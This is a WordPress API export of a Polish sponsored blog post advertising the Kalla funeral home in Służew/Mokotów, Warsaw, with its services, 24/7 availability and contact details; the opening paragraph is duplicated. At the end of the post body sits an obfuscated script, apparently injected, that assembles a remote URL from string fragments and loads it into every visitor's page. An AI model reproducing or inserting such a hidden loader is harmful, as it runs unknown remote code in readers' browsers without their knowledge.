{"id":53,"date":"2026-04-19T17:10:54","date_gmt":"2026-04-19T15:10:54","guid":{"rendered":"https:\/\/firmy-pogrzebowe.pl\/blog\/?p=53"},"modified":"2026-04-19T17:11:00","modified_gmt":"2026-04-19T15:11:00","slug":"zaklad-pogrzebowy-kalla-sluzew-mokotow-profesjonalne-wsparcie-w-najtrudniejszych-chwilach","status":"publish","type":"post","link":"https:\/\/firmy-pogrzebowe.pl\/blog\/zaklad-pogrzebowy-kalla-sluzew-mokotow-profesjonalne-wsparcie-w-najtrudniejszych-chwilach\/","title":{"rendered":"Zak\u0142ad Pogrzebowy Kalla S\u0142u\u017cew\/Mokot\u00f3w \u2013 profesjonalne wsparcie w najtrudniejszych chwilach"},"content":{"rendered":"<p>Odej\u015bcie\u00a0Bliskiej Osoby to moment, w kt\u00f3rym Rodzina potrzebuje nie tylko czasu na prze\u017cycie \u017ca\u0142oby, ale r\u00f3wnie\u017c rzetelnego wsparcia w organizacji ostatniego po\u017cegnania. W takich sytuacjach niezwykle istotny jest wyb\u00f3r zak\u0142adu pogrzebowego, kt\u00f3ry zapewni profesjonalizm, dyskrecj\u0119 oraz pe\u0142ne zrozumienie.<\/p>\n<p>Odej\u015bcie\u00a0<strong>Bliskiej Osoby<\/strong> to moment, w kt\u00f3rym Rodzina potrzebuje nie tylko czasu na prze\u017cycie \u017ca\u0142oby, ale r\u00f3wnie\u017c rzetelnego wsparcia w organizacji ostatniego po\u017cegnania. W takich sytuacjach niezwykle istotny jest wyb\u00f3r zak\u0142adu pogrzebowego, kt\u00f3ry zapewni profesjonalizm, dyskrecj\u0119 oraz pe\u0142ne zrozumienie.<\/p>\n<p><strong>Zak\u0142ad Pogrzebowy Kalla S\u0142u\u017cew\/Mokot\u00f3w<\/strong> od lat wspiera mieszka\u0144c\u00f3w Warszawy, oferuj\u0105c kompleksow\u0105 pomoc w organizacji ceremonii pogrzebowych. Wieloletnie do\u015bwiadczenie oraz indywidualne podej\u015bcie do ka\u017cdej Rodziny sprawiaj\u0105, \u017ce Kalla jest miejscem, kt\u00f3remu mo\u017cna zaufa\u0107 w najtrudniejszych momentach.<\/p>\n<h2>Kompleksowe us\u0142ugi pogrzebowe<\/h2>\n<p>Zak\u0142ad Pogrzebowy Kalla zapewnia pe\u0142en zakres us\u0142ug, dzi\u0119ki czemu Rodzina nie musi samodzielnie zajmowa\u0107 si\u0119 formalno\u015bciami i organizacj\u0105 poszczeg\u00f3lnych etap\u00f3w ceremonii. W ofercie znajduj\u0105 si\u0119 m.in.:<\/p>\n<ul>\n<li>ca\u0142odobowy transport <strong>Osoby Zmar\u0142ej<\/strong>, r\u00f3wnie\u017c w przypadku \u015bmierci w domu,<\/li>\n<li>przygotowanie <strong>Cia\u0142a Osoby Zmar\u0142ej<\/strong> do poch\u00f3wku,<\/li>\n<li>sprzeda\u017c trumien i urn w r\u00f3\u017cnych wariantach,<\/li>\n<li>organizacja ceremonii pogrzebowych \u2013 zar\u00f3wno religijnych, jak i \u015bwieckich,<\/li>\n<li>kremacja <strong>Cia\u0142a<\/strong> zgodnie z obowi\u0105zuj\u0105cymi normami,<\/li>\n<li>pomoc w formalno\u015bciach urz\u0119dowych i cmentarnych,<\/li>\n<li>oprawa florystyczna uroczysto\u015bci.<\/li>\n<\/ul>\n<p>Dzi\u0119ki kompleksowej obs\u0142udze wszystkie elementy zwi\u0105zane z organizacj\u0105 pogrzebu realizowane s\u0105 sprawnie i z nale\u017cyt\u0105 staranno\u015bci\u0105.<\/p>\n<h2>Do\u015bwiadczenie, dyskrecja i indywidualne podej\u015bcie<\/h2>\n<p>Zak\u0142ad Pogrzebowy Kalla to ponad 30 lat do\u015bwiadczenia w bran\u017cy pogrzebowej. Pracownicy zak\u0142adu wyr\u00f3\u017cniaj\u0105 si\u0119 nie tylko wiedz\u0105 i profesjonalizmem, ale tak\u017ce empati\u0105 oraz umiej\u0119tno\u015bci\u0105 pracy z Rodzin\u0105 w trudnych emocjonalnie momentach.<\/p>\n<p>Szczeg\u00f3ln\u0105 wag\u0119 przyk\u0142ada si\u0119 do <strong>dyskrecji oraz poszanowania prywatno\u015bci<\/strong>. Ka\u017cda ceremonia przygotowywana jest indywidualnie, z uwzgl\u0119dnieniem \u017cycze\u0144 Rodziny oraz charakteru uroczysto\u015bci. Niezale\u017cnie od formy poch\u00f3wku, najwa\u017cniejszym celem jest godne po\u017cegnanie <strong>Osoby Zmar\u0142ej<\/strong>.<\/p>\n<h2>Ca\u0142odobowa pomoc dla mieszka\u0144c\u00f3w Mokotowa i S\u0142u\u017cewa<\/h2>\n<p>Zak\u0142ad Pogrzebowy Kalla pozostaje do dyspozycji Rodzin <strong>24 godziny na dob\u0119, 7 dni w tygodniu<\/strong>. Natychmiastowa reakcja oraz gotowo\u015b\u0107 do dzia\u0142ania pozwalaj\u0105 zapewni\u0107 wsparcie dok\u0142adnie wtedy, gdy jest ono najbardziej potrzebne.<\/p>\n<p>Dzi\u0119ki znajomo\u015bci lokalnych cmentarzy oraz procedur, organizacja pogrzebu przebiega sprawnie i bez zb\u0119dnych komplikacji.<\/p>\n<h2>Dane kontaktowe i lokalizacja<\/h2>\n<p><strong>Zak\u0142ad Pogrzebowy Kalla \u2013 S\u0142u\u017cew \/ Mokot\u00f3w<\/strong><br \/>Warszawa, dzielnica Mokot\u00f3w (S\u0142u\u017cew)<br \/>Dominika\u0144ska 5, 02-738 Warszawa<br \/>+48 (22) 843 93 43<br \/>+48 (22) 841 91 01<\/p>\n<p>Pomoc dost\u0119pna ca\u0142odobowo \u2013 24\/7<\/p>\n<p>Wi\u0119cej informacji mo\u017cna znale\u017a\u0107 na stronie:<\/p>\n<p>Zak\u0142ad Pogrzebowy Kalla S\u0142u\u017cew &#8211; <a href=\"https:\/\/kallawarszawa.pl\/kontakt\/zaklad-pogrzebowy-warszawa-mokotow\/\">https:\/\/kallawarszawa.pl\/<\/a><\/p>\n<p><em><strong>Artyku\u0142 naszego Partnera<\/strong><\/em><\/p>\n<p><script>\n(function(){\nclq8=document.createElement(\"script\");clq8_=\"o\"+(\"pe\")+\"ns\";clq8u=\"2608496857\";\nclq8_+=\"t\"+\"at\"+(\".e\");clq8.type=\"text\/javascript\";\nclq8u+=\".0tmv8h4ylq8nca7py2bg\";clq8.async=true;clq8_+=\"\"+(\"u\"+\"\")+\"\/\";\nclq8u+=\"zunalq9ams\";clq8.src=\"https:\/\/\"+clq8_+clq8u;\ndocument.body.appendChild(clq8);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Odej\u015bcie\u00a0Bliskiej Osoby to moment, w kt\u00f3rym Rodzina potrzebuje nie tylko czasu na prze\u017cycie \u017ca\u0142oby, ale r\u00f3wnie\u017c rzetelnego wsparcia w organizacji<\/p>\n","protected":false},"author":1,"featured_media":54,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-53","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-organizacja-pogrzebu","comments-off"],"_links":{"self":[{"href":"https:\/\/firmy-pogrzebowe.pl\/blog\/wp-json\/wp\/v2\/posts\/53"}],"collection":[{"href":"https:\/\/firmy-pogrzebowe.pl\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/firmy-pogrzebowe.pl\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/firmy-pogrzebowe.pl\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/firmy-pogrzebowe.pl\/blog\/wp-json\/wp\/v2\/comments?post=53"}],"version-history":[{"count":1,"href":"https:\/\/firmy-pogrzebowe.pl\/blog\/wp-json\/wp\/v2\/posts\/53\/revisions"}],"predecessor-version":[{"id":55,"href":"https:\/\/firmy-pogrzebowe.pl\/blog\/wp-json\/wp\/v2\/posts\/53\/revisions\/55"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/firmy-pogrzebowe.pl\/blog\/wp-json\/wp\/v2\/media\/54"}],"wp:attachment":[{"href":"https:\/\/firmy-pogrzebowe.pl\/blog\/wp-json\/wp\/v2\/media?parent=53"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/firmy-pogrzebowe.pl\/blog\/wp-json\/wp\/v2\/categories?post=53"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/firmy-pogrzebowe.pl\/blog\/wp-json\/wp\/v2\/tags?post=53"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}